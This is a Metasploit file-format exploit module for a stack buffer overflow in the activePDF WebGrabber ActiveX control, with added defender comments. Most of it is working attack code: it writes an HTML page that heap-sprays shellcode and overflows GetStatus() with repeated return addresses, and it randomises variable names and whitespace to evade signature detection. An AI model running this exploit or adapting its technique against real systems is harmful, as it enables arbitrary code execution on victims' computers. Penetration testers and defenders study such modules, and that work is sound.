Path: blob/master/modules/exploits/windows/fileformat/activepdf_webgrabber.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format exploit module for the activePDF WebGrabber ActiveX control.
#
# The module does no network I/O itself: the FILEFORMAT mixin is used to
# write a single HTML file (datastore['FILENAME'], default 'msf.html') whose
# script instantiates the control and calls GetStatus() with an oversized
# string. Everything else (delivery, the victim opening the file in IE) is
# outside this module, which is why the payload handler is disabled below.
#
# Defender notes: the generated page is recognisable by the ActiveXObject
# ProgID 'APWebGrabber.Object' and the GetStatus() call; the module itself
# states the control is not marked safe for scripting, so default IE zone
# settings that refuse unsafe-for-scripting controls already block the
# technique. Setting the kill bit on the control's CLSID (not listed in this
# file) removes the attack surface entirely.
class MetasploitModule < Msf::Exploit::Remote
  # Low rank: the single target depends on a fixed return address
  # (see 'Ret' below), so reliability is limited to the listed platforms.
  Rank = LowRanking

  include Msf::Exploit::FILEFORMAT

  # Registers module metadata and the single FILENAME option.
  #
  # info - Hash of overrides merged via update_info (standard Msf pattern).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'activePDF WebGrabber ActiveX Control Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When
          sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)
          an attacker may be able to execute arbitrary code. This control is not marked safe
          for scripting, so choose your attack vector accordingly.

      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'References'     =>
        [
          [ 'OSVDB', '64579'],
          [ 'URL', 'http://www.activepdf.com/products/serverproducts/webgrabber/' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          # No listener is started: this module only produces a file.
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          # NUL is excluded because the payload travels inside a JS string.
          'BadChars' => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # 'Ret' is a fixed, predictable address; the target list reflects the
          # OS/browser combinations where that assumption held at disclosure.
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
        ],
      'DisclosureDate' => '2008-08-26',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
      ])
  end

  # Builds the HTML document and writes it with file_create.
  #
  # Side effects: prints a status line and creates datastore['FILENAME'].
  # Returns whatever file_create returns; nothing in this file reads it.
  def exploit
    # Encode the shellcode.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Create some nops.
    nops = Rex::Text.to_unescape(make_nops(4))

    # Set the return.
    # target.ret is packed little-endian ('L') and URI-encoded so the JS
    # below can expand it with unescape().
    ret = Rex::Text.uri_encode([target.ret].pack('L'))

    # Randomize the javascript variable names.
    # Lengths are random per run, so static rules keyed on variable names
    # will not match; key on the ProgID / method name instead.
    vname = rand_text_alpha(rand(100) + 1)
    var_i = rand_text_alpha(rand(30) + 2)
    rand1 = rand_text_alpha(rand(100) + 1)
    rand2 = rand_text_alpha(rand(100) + 1)
    rand3 = rand_text_alpha(rand(100) + 1)
    rand4 = rand_text_alpha(rand(100) + 1)
    rand5 = rand_text_alpha(rand(100) + 1)
    rand6 = rand_text_alpha(rand(100) + 1)
    rand7 = rand_text_alpha(rand(100) + 1)
    rand8 = rand_text_alpha(rand(100) + 1)

    # The script first fills memory with 400 large (0x40000-byte) nop+payload
    # strings so the fixed 'Ret' address lands in controlled data, then
    # passes 800 copies of that address as the oversized GetStatus() argument.
    # Any script error redirects to about:blank, which hides failures from the
    # user; a blank-page redirect right after ActiveX instantiation is itself
    # a useful triage signal.
    content = %Q|<html>
<head>
<script>
try {
var #{vname} = new ActiveXObject('APWebGrabber.Object');
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 800; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.GetStatus(#{rand8},1);
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|

    # Whitespace is varied so two generated files are not byte-identical;
    # hash-based blocking of one sample will not catch the next.
    content = Rex::Text.randomize_space(content)

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(content)
  end
end

=begin

Other methods of the control reported as vulnerable (IDL excerpts); this
module only targets GetStatus().

[id(0x00000050), helpstring("Clean up after a WWWPrint call.")]
void CleanUp(BSTR ServerIPAddress, long ServerPort);

[id(0x00000055)]
BSTR Wait(BSTR IPAddress, long PortNumber, short WaitTime, BSTR AcceptedCommands);

...and probably more.
=end